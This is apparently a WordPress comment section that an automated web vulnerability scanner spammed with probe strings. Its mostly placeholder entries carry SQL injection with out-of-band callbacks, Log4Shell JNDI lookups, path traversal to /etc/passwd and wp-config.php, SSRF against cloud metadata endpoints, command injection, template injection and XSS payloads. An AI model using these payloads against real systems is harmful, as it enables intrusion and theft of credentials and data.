3034. comment

3035. comment

3036. comment

3037. comment

3038. comment

3039. comment

3040. comment

3041. comment

3042. comment

3043. comment

3044. comment

3045. comment

3046. comment

3047. comment

3048. comment

3049. comment

3050. comment

3051. comment

3052. comment

3053. comment

3054. comment

3055. comment

3056. comment

3057. comment

3058. comment

3059. comment

3060. comment

3061. comment

3062. comment

3063. comment

3064. comment

3065. comment

3066. comment

3067. comment

3068. comment

3069. comment

3070. comment

3071. comment

3072. comment

3073. comment

3074. comment

3075. comment

3076. comment

3077. comment

3078. comment

3079. comment

3080. comment

3081. comment

3082. comment

3083. comment

3084. comment

3085. comment

3086. comment

3087. comment

3088. comment

3089. comment

3090. comment

3091. comment

3092. comment

3093. comment

3094. comment

3095. comment

3096. comment

3097. comment

3098. comment

3099. comment

3100. comment

3101. comment

3102. comment

3103. comment

3104. comment

3105. comment

3106. comment

3107. comment

3108. comment

3109. comment

3110. comment

3111. comment

3112. comment

3113. comment

3114. comment

3115. comment

3116. comment

3117. comment

3118. comment

3119. comment

3120. comment

3121. comment

3122. comment

3123. comment

3124. comment

3125. comment

3126. comment

3127. comment

3128. comment

3129. comment

3130. comment

3131. comment

3132. comment

3133. comment

3134. comment

3135. comment

3136. comment

3137. comment

3138. comment

3139. comment

3140. comment

3141. comment

3142. comment

3143. comment

3144. comment

3145. comment

3146. comment

3147. comment

3148. comment

3149. comment

3150. comment

3151. comment

3152. comment

3153. comment

3154. comment

3155. comment

3156. comment

3157. comment

3158. comment

3159. comment

3160. comment

3161. comment

3162. comment

3163. comment

3164. comment

3165. comment

3166. comment

3167. comment

3168. comment

3169. comment

3170. comment

3171. comment

3172. comment

3173. comment

3174. comment

3175. comment

3176. comment

3177. comment

3178. comment

3179. comment

3180. comment

3181. comment

3182. comment

3183. comment

3184. comment

3185. comment

3186. comment

3187. comment

3188. comment

3189. comment

3190. comment

3191. comment

3192. comment

3193. comment

3194. comment

3195. comment

3196. comment

3197. comment

3198. comment

3199. comment

3200. comment

3201. comment

3202. comment

3203. comment

3204. comment

3205. comment

3206. comment

3207. comment

3208. comment

3209. comment

3210. comment

3211. comment

3212. comment

3213. comment

3214. comment

3215. comment

3216. comment

3217. comment

3218. comment

3219. comment

3220. comment

3221. comment

3222. comment

3223. comment

3224. comment

3225. comment

3226. comment

3227. comment

3228. comment

3229. comment

3230. comment

3231. comment

3232. comment

3233. comment

3234. comment

3235. comment

3236. comment

3237. comment

3238. comment

3239. comment

3240. comment

3241. comment

3242. comment

3243. comment

3244. comment

3245. comment

3246. comment

3247. comment

3248. comment

3249. comment

3250. comment

3251. comment

3252. comment

3253. comment

3254. comment

3255. comment

3256. comment

3257. comment

3258. comment

3259. comment

3260. comment

3261. comment

3262. comment

3263. comment

3264. comment

3265. comment

3266. comment

3267. comment

3268. comment

3269. comment

3270. comment

3271. comment

3272. comment

3273. comment

3274. comment

3275. comment

3276. comment

3277. comment

3278. comment

3279. comment

3280. comment

3281. comment

3282. comment

3283. comment

3284. comment

3285. comment

3286. comment

3287. comment

3288. comment

3289. comment

3290. comment

3291. comment

3292. comment

3293. comment

3294. comment

3295. comment

3296. comment

3297. comment

3298. comment

3299. comment

3300. commentx7r9fqh5

3301. x7vznr6y'”x7vznr6y

3302. comment

3303. comment

3304. comment

3305. comment

3306. comment

3307. comment

3308. comment

3309. comment

3310. comment

3311. comment

3312. comment

3313. comment

3314. comment

3315. comment

3316. comment

3317. comment

3318. comment

3319. comment

3320. comment

3321. comment

3322. comment

3323. comment

3324. comment’;+exec+master..xp_dirtree+”//0f6e6a555ae4692f093c14af80ac259951a97bd5.oob.appspidered.rapid7.com/a”–

3325. comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’7419f816dc2336f311a27340ca7b8b335c3d56af.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–

3326. comment’;+SELECT+LOAD_FILE(‘\\\\24c0005932e70c0cbf6c185e402de3b4c7bc7c46.oob.appspidered.rapid7.com\\a’)#

3327. comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\7f2d3fdade0338c8d3b0be9d2ac4d6e4dbc6b190.oob.appspidered.rapid7.com\\a’#

3328. comment’;+copy+(SELECT+”)+to+program+’nslookup+a83f361f6bf993437d9b229baaa0124ed130fab0.oob.appspidered.rapid7.com’–

3329. comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://dc16d13eefad39fe315cb0346ebaa2259fe6afa5.oob.appspidered.rapid7.com/’)+END)–

3330. http://appspidered.rapid7.com/xss/script/f2775d1cf683889bba719eea9ea4df32bbf60ca4

3331. http://appspidered.rapid7.com/xss/script/7ce7f3f1e4b3aed067eb09afc545bf81a0ec4891

3332. http://appspidered.rapid7.com/xss/script/34e96ee4c8d89573c1fe37a442dce3935de8f38d

3333. http://appspidered.rapid7.com/xss/script/e077b07f15d8c43d67f5eacc25d88a99f57fc9d5

3334. https://appspidered.rapid7.com/xss/script/f1d63ea82ee47fffd4968d23c52eb7af2efedd05

3335. https://appspidered.rapid7.com/xss/script/c64697efec36fbe82e472656c75fc1a34e1d7e64

3336. https://appspidered.rapid7.com/xss/script/a8ef523d5ee75b669fadb414515a280a3cda37a0

3337. https://appspidered.rapid7.com/xss/script/3ced6407d6231fa20d8c51257644ea6f03ca4f3b

3338. http://appspidered.rapid7.com/xss/script/d0b96cf75b7a571aad93e2166601d03f0191c5db

3339. http://appspidered.rapid7.com/xss/script/7df3ef7a2633a83dc8c4e67db7e352e5ecc09baa

3340. http://appspidered.rapid7.com/xss/script/b96beccd56e6f69efa4683a9708559120c780e57

3341. http://appspidered.rapid7.com/xss/script/82d6031d5d730deee1ed95eefadeb3dd60aad9e2

3342. https://appspidered.rapid7.com/xss/script/7297b02a02273bb834e361a24e0b21e229b662e7

3343. https://appspidered.rapid7.com/xss/script/8d30d797f5b60db7cc98c57162822e2a6181ca82

3344. https://appspidered.rapid7.com/xss/script/4c0aa0ea4213a6e8307c3c0886d7b50ed935c971

3345. https://appspidered.rapid7.com/xss/script/666ddc682cd0ccefec6002afef5a8f3157ac4f76

3346. appspidered.rapid7.com/xss/script/a0fbc6ce9ca8ee3cd3ff8556782c699d8172bb17

3347. appspidered.rapid7.com/xss/script/7c1802bd9f589dbb2cd5fff96b19750093112205

3348. appspidered.rapid7.com/xss/script/1f1c09075601fea6197d9578111c1e92e73007cd

3349. appspidered.rapid7.com/xss/script/8676c950e2c6ee16db8755f598473dcd7ad58755

3350. wp-comments-post.php

3351. /etc/passwd

3352. \WINDOWS\system32\drivers\etc\hosts

3353. C:\WINDOWS\system32\drivers\etc\hosts

3354. ..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts

3355. ..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts.htm

3356. wp-comments-post.php

3357. /wp-comments-post.php

3358. ../../../../../../../../../../etc/hosts

3359. < /etc/passwd

3360. /.

3361. \.

3362. c:\.

3363. http://appspidered.rapid7.com/

3364. http://appspidered.rapid7.com/

3365. appspidered.rapid7.com/

3366. wp-comments-post.php.

3367. ../wp-comments-post.php.

3368. ../../wp-comments-post.php.

3369. c:\boot.ini.

3370. c:\boot.ini

3371. d:\boot.ini

3372. ../../../../../../boot.ini.

3373. ../../../../../../boot.ini

3374. noexistnoexist.

3375. ../../../../../../../../../../etc/hosts.

3376. /..

3377. \..

3378. /etc/passwd

3379. file:/etc/passwd

3380. file:/wp-comments-post.php

3381. /WEB-INF/web.xml

3382. WEB-INF/web.xml

3383. file:WEB-INF/web.xml

3384. /../../WEB-INF/web.xml

3385. \WEB-INF\web.xml

3386. /../../../../../../../../../../.

3387. noexistnoexist

3388. /.

3389. /.

3390. http://localhost/

3391. http://localhost:22/

3392. package.json.bak

3393. package.json.bak

3394. package.json.bak%00

3395. ../wp-config.php

3396. http://appspidered.rapid7.com/rfi/x7kibfkw

3397. /../../../../../../../../../../vendor.js

3398. ../../../../../

3399. ..\..\..\..\..\

3402. ${applicationScope}

3403. ${requestScope}

3404. ${“asdflkj”.toString().replace(“d”,”x”)}

3405. #{“asdflkj”.toString().replace(“d”,”x”)}

3406. {{ 58719 * 21973 }}

3407. {{ 62951705 + 74179523 }}

3408. x7163k7b

3409. x73ffae8

3410. x74tc9fq: x74tc9fq

3414. comment” && sleep(00) && “1”!=”1

3415. comment” && sleep(10000) && “1”!=”1

3416. comment’ && ‘1’==’0

3417. comment’ && ‘1’==’1

3418. http://169.254.169.254/latest/meta-data/ami-id

3419. http://169.254.169.254/latest/meta-data/reservation-id

3420. http://169.254.169.254/latest/meta-data/hostname

3421. http://169.254.169.254/latest/meta-data/network/interfaces/macs/

3422. http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

3423. http://169.254.169.254/latest/dynamic/instance-identity/document

3424. http://169.254.169.254/metadata/instance/compute?api-version=2019-08-15

3425. http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0?api-version=2019-08-15

3426. http://169.254.169.254/metadata/instance/network/interface/0?api-version=2019-08-15

3427. ‘comment

3428. comment’

3429. comment”

3430. comment’

3431. comment

3432. comment%u0027

3433. comment%22

3434. LIMIT a

3435. 1e309

3436. char(0x27)char(0x27)comment

3437. %u201ccomment

3438. %u201ecomment

3439. — comment

3440. /*comment

3441. commentʼ

3442. comment’ UNION ALL select NULL —

3443. comment” UNION ALL select NULL —

3444. comment$0

3445. comment|/bin/cat /etc/passwd|

3446. comment;/etc/hosts

3447. comment|/bin/cat /etc/hosts|

3448. comment;/usr/bin/id

3449. comment|/bin/cat /usr/bin/id

3450. comment|/bin/cat /usr/bin/id|

3451. comment&ipconfig

3452. netstat -na

3453. comment|netstat -na

3454. comment|ping -h|

3455. comment|$LANG|

3456. ; free

3457. ${jndi:ldap://5833b977fe3a869095ec1b9fea650af80a4583b7.oob.appspidered.rapid7.${lower:COM}}

3458. http://www.example.com/

3459. !comment

3460. comment

3461. comment

3462. comment

3463. comment

3464. comment

3465. comment

3466. comment

3467. comment

3468. comment

3469. comment

3470. comment

3471. comment

3472. alert(3468905)

3473. comment

3474. comment

3475. comment

3476. comment

3477. comment

3478. comment

3479. comment

3480. comment

3481. comment

3482. comment

3483. comment

3484. comment

3485. ‘>alert(4210656)

3486. comment

3487. comment

3488. comment

3489. ‘>alert(4645025)

3490. comment

3491. comment

3492. comment

3493. comment

3494. comment

3495. comment

3496. comment

3497. comment

3498. comment

3499. comment

3500. comment

3501. comment

3502. comment

3503. comment

3504. comment

3505. comment

3506. comment

3507. comment%’

3508. comment

3509. comment

3510. comment

3511. %u2018comment

3512. comment

3513. comment

3514. comment”}

3515. comment”}}, {x7op3k8n:{$meta: “textScore

3516. comment’ AND 1=0)–

3517. REPEAT(0x636f6d6d656e74,2)

3518. comment’ AND 1=1 LIMIT 1–

3519. comment

3520. comment

3521. comment

3522. comment’ OR 1=1 —

3523. comment

3524. comment

3525. comment

3526. comment

3527. comment

3528. comment

3529. comment

3530. comment

3531. comment

3532. comment

3533. comment

3534. comment

3535. comment

3536. comment

3537. comment

3538. comment

3539. comment’ and 1 in (select BENCHMARK(220000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

3540. comment ‘;select pg_sleep(05);– –

3541. comment

3542. comment

3543. comment

3544. comment

3545. comment

3546. comment

3547. comment

3548. comment

3549. comment

3550. comment

3551. comment

3552. comment

3553. comment

3554. comment

3555. comment

3556. comment

3557. comment

3558. comment

3559. comment

3560. comment

3561. comment

3562. comment

3563. comment

3564. comment

3565. comment

3566. comment

3567. comment

3568. comment

3569. comment

3570. comment

3571. comment

3572. comment

3573. comment

3574. comment

3575. comment

3576. comment

3577. comment

3578. comment

3579. comment

3580. comment

3581. comment

3582. comment

3583. comment

3584. comment

3585. comment

3586. comment

3587. comment

3588. comment

3589. comment

3590. comment

3591. comment

3592. comment

3593. comment

3594. comment

3595. comment

3596. comment

3597. comment

3598. comment

3599. comment

3600. comment

3601. comment

3602. comment

3603. comment

3604. comment

3605. comment

3606. comment

3607. comment

3608. comment

3609. comment

3610. comment

3611. comment

3612. comment

3613. comment

3614. comment

3615. comment

3616. comment

3617. comment

3618. comment

3619. comment

3620. comment

3621. comment

3622. comment

3623. comment

3624. comment

3625. comment

3626. comment

3627. comment

3628. comment

3629. comment

3630. comment

3631. comment

3632. comment

3633. comment

3634. comment

3635. comment

3636. comment

3637. comment

3638. comment

3639. comment

3640. comment

3641. comment

3642. comment

3643. comment

3644. comment

3645. comment

3646. comment

3647. comment